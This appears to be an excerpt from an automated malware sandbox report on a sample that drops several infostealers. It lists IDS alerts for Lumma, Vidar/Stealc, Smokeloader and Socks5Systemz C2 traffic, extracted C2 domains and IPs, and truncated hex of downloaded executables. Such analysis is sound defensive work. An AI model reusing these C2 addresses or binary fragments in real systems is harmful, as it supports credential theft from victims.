                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49809 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49808 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49795 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.9:49784 -> 45.132.206.251:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49806 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2056009 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (chickerkuso .shop in TLS SNI) : 192.168.2.9:49787 -> 172.67.173.81:443
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49804 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49814 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49790 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49788 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49822 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49826 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49819 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49825 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49827 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49797 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49816 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49824 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49836 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49839 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49833 -> 62.150.232.50:80
                              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49835 -> 62.150.232.50:80
                              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49830 -> 62.150.232.50:80
                              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49840 -> 62.150.232.50:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49834 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49829 -> 62.150.232.50:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49841 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49820 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49837 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49815 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49838 -> 62.150.232.50:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49817 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49828 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49823 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49842 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49832 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49821 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49831 -> 62.150.232.50:80
                              Source: Network trafficSuricata IDS: 2056009 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (chickerkuso .shop in TLS SNI) : 192.168.2.9:49779 -> 172.67.173.81:443
                              Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49785 -> 185.196.8.214:80
                              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49843 -> 62.150.232.50:80
                              Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.9:49747 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.165.127:443 -> 192.168.2.9:49753
                              Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.165.127:443 -> 192.168.2.9:49751
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49779 -> 172.67.173.81:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49779 -> 172.67.173.81:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49781 -> 104.21.85.92:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49781 -> 104.21.85.92:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49794 -> 104.21.85.92:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49794 -> 104.21.85.92:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49787 -> 172.67.173.81:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49787 -> 172.67.173.81:443
                              Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.165.127:443 -> 192.168.2.9:49805
                              Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.165.127:443 -> 192.168.2.9:49801
                              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7504, type: MEMORYSTR
                              Source: Malware configuration extractorURLs: opponnentduei.shop
                              Source: Malware configuration extractorURLs: chickerkuso.shop
                              Source: Malware configuration extractorURLs: sentistivowmi.shop
                              Source: Malware configuration extractorURLs: metallygaricwo.shop
                              Source: Malware configuration extractorURLs: quotamkdsdqo.shop
                              Source: Malware configuration extractorURLs: achievenmtynwjq.shop
                              Source: Malware configuration extractorURLs: milldymarskwom.shop
                              Source: Malware configuration extractorURLs: carrtychaintnyw.shop
                              Source: Malware configuration extractorURLs: puredoffustow.shop
                              Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199780418869
                              Source: Malware configuration extractorURLs: http://nwgrus.ru/tmp/index.php
                              Source: Malware configuration extractorURLs: http://tech-servers.in.net/tmp/index.php
                              Source: Malware configuration extractorURLs: http://unicea.ws/tmp/index.php
                              Source: Malware configuration extractorIPs: 45.202.35.101
                              Source: Malware configuration extractorURLs: f20pt.top
                              Source: Malware configuration extractorURLs: analforeverlovyu.top
                              Source: Malware configuration extractorURLs: tventyvf20pt.top
                              Source: Malware configuration extractorURLs: +tventyvf20pt.top
                              Source: Malware configuration extractorURLs: pt.top
                              Source: Malware configuration extractorURLs: @tventyvf20pt.top
                              Source: Malware configuration extractorURLs: tyvf20pt.top
                              Source: Malware configuration extractorURLs: 193.233.255.84:4284
                              Source: global trafficTCP traffic: 192.168.2.9:49745 -> 193.233.255.84:4284
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 21 Sep 2024 12:48:08 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Fri, 20 Sep 2024 19:40:07 GMTETag: "65ba6e-6229234d7ee13"Accept-Ranges: bytesContent-Length: 6666862Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 0e 7d ed 66 00 74 5f 00 a6 25 00 00 e0 00 06 01 0b 01 02 23 00 40 48 00 00 c6 5a 00 00 e4 66 00 b0 14 00 00 00 10 00 00 00 50 48 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 c6 00 00 06 00 00 29 87 66 00 02 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 a0 b3 00 42 00 00 00 00 b0 b3 00 e4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 b3 00 68 20 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 f9 48 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 b1 b3 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 3e 48 00 00 10 00 00 00 40 48 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 88 18 00 00 00 50 48 00 00 1a 00 00 00 46 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 38 9b 00 00 00 70 48 00 00 9c 00 00 00 60 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2f 34 00 00 00 00 00 00 e0 9d 03 00 00 10 49 00 00 9e 03 00 00 fc 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 54 e2 66 00 00 b0 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 42 00 00 00 00 a0 b3 00 00 02 00 00 00 9a 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 e4 09 00 00 00 b0 b3 00 00 0a 00 00 00 9c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 34 00 00 00 00 c0 b3 00 00 02 00 00 00 a6 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 d0 b3 00 00 02 00 00 00 a8 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 68 20 0e 00 00 e0 b3 00 00 22 0e 00 00 aa 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 31 34 00 00 00 00 00 90 06 00 00 00 10 c2 00 00 08 00 00 00 cc 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 32 39 00 00 00 00 00 c4 a7 01 00 00 20 c2 00 00 a8 01 00 00 d4 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 31 00 00 00 00 00 58 4c 00 00 00 d0 c3 00 00 4e 00 00 00 7c 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 35 00 00 00 00 00 42 e3
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 12:48:09 GMTContent-Type: application/octet-streamContent-Length: 4249600Last-Modified: Sun, 15 Sep 2024 16:05:36 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66e705d0-40d800"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 5f 55 fb d1 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 9c 3e 00 00 38 02 00 00 00 00 00 ae ba 3e 00 00 20 00 00 00 c0 3e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 41 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 60 ba 3e 00 4b 00 00 00 00 e0 3e 00 84 2e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 41 00 0c 00 00 00 10 ba 3e 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 9a 3e 00 00 20 00 00 00 9c 3e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 84 04 00 00 00 c0 3e 00 00 06 00 00 00 a0 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 84 2e 02 00 00 e0 3e 00 00 30 02 00 00 a6 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 41 00 00 02 00 00 00 d6 40 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.1Date: Sat, 21 Sep 2024 12:48:09 GMTContent-Type: application/octet-streamContent-Length: 3143204Connection: keep-aliveX-Powered-By: PHP/7.4.33Content-Description: File TransferContent-Disposition: attachment; filename=noode.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 9e 00 00 00 46 00 00 00 00 00 00 f8 a5 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 30 9d 00 00 00 10 00 00 00 9e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 50 02 00 00 00 b0 00 00 00 04 00 00 00 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 8c 0e 00 00 00 c0 00 00 00 00 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 50 09 00 00 00 d0 00 00 00 0a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 e0 00 00 00 00 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 00 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 c4 08 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 2c 00 00 00 10 01 00 00 2c 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 12:48:09 GMTContent-Type: application/octet-streamContent-Length: 418816Last-Modified: Sat, 21 Sep 2024 07:43:45 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ee7931-66400"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d ba df d9 09 db b1 8a 09 db b1 8a 09 db b1 8a 66 ad 1a 8a 1b db b1 8a 66 ad 2f 8a 06 db b1 8a 66 ad 1b 8a 5c db b1 8a 00 a3 22 8a 02 db b1 8a 09 db b0 8a 86 db b1 8a 66 ad 1e 8a 08 db b1 8a 66 ad 2b 8a 08 db b1 8a 66 ad 2c 8a 08 db b1 8a 52 69 63 68 09 db b1 8a 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 12 f6 25 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 48 03 00 00 b4 04 02 00 00 00 00 7e 3e 00 00 00 10 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 07 02 00 04 00 00 c5 b4 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 4a 03 00 78 00 00 00 00 10 05 02 e8 bc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 4b 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2a 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6a 47 03 00 00 10 00 00 00 48 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 8c ac 01 02 00 60 03 00 00 5a 00 00 00 4c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 bc 02 00 00 10 05 02 00 be 02 00 00 a6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 12:48:10 GMTContent-Type: application/octet-streamContent-Length: 331640Last-Modified: Sat, 21 Sep 2024 10:55:47 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66eea633-50f78"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3d a1 ee 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 dc 04 00 00 08 00 00 00 00 00 00 5e fb 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 fb 04 00 53 00 00 00 00 00 05 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 e6 04 00 78 29 00 00 00 20 05 00 0c 00 00 00 d0 f9 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 db 04 00 00 20 00 00 00 dc 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 05 00 00 00 00 05 00 00 06 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 